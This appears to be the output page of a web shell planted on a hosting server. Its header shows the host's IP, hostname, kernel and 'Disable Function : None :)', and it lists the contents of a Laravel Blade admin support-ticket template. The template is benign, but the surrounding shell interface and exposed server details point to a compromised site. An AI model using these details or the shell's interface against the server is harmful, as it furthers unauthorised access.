uawdijnntqw1x1x1
IP : 18.223.171.83
Hostname : host45.registrar-servers.com
Kernel : Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
jackpotjunglegam
/
public_html
/
80d3f
/
..
/
core
/
resources
/
views
/
admin
/
support
/
tickets.blade.php
/
/
@extends('admin.layouts.app') @section('panel') <div class="row"> <div class="col-lg-12"> <div class="card b-radius--10 "> <div class="card-body p-0"> <div class="table-responsive--sm table-responsive"> <table class="table table--light"> <thead> <tr> <th>@lang('Subject')</th> <th>@lang('Submitted By')</th> <th>@lang('Status')</th> <th>@lang('Priority')</th> <th>@lang('Last Reply')</th> <th>@lang('Action')</th> </tr> </thead> <tbody> @forelse($items as $item) <tr> <td> <a href="{{ route('admin.ticket.view', $item->id) }}" class="fw-bold"> [@lang('Ticket')#{{ $item->ticket }}] {{ strLimit($item->subject,30) }} </a> </td> <td> @if($item->user_id) <a href="{{ route('admin.users.detail', $item->user_id)}}"> {{@$item->user->fullname}}</a> @else <p class="fw-bold"> {{$item->name}}</p> @endif </td> <td> @php echo $item->statusBadge; @endphp </td> <td> @if($item->priority == Status::PRIORITY_LOW) <span class="badge badge--dark">@lang('Low')</span> @elseif($item->priority == Status::PRIORITY_MEDIUM) <span class="badge badge--warning">@lang('Medium')</span> @elseif($item->priority == Status::PRIORITY_HIGH) <span class="badge badge--danger">@lang('High')</span> @endif </td> <td> {{ diffForHumans($item->last_reply) }} </td> <td> <a href="{{ route('admin.ticket.view', $item->id) }}" class="btn btn-sm btn-outline--primary ms-1"> <i class="las la-desktop"></i> @lang('Details') </a> </td> </tr> @empty <tr> <td class="text-muted text-center" colspan="100%">{{ __($emptyMessage) }}</td> </tr> @endforelse </tbody> </table><!-- table end --> </div> </div> @if ($items->hasPages()) <div class="card-footer py-4"> {{ paginateLinks($items) }} </div> @endif </div><!-- card end --> </div> </div> @endsection
/home/jackpotjunglegam/public_html/80d3f/../core/resources/views/admin/support/tickets.blade.php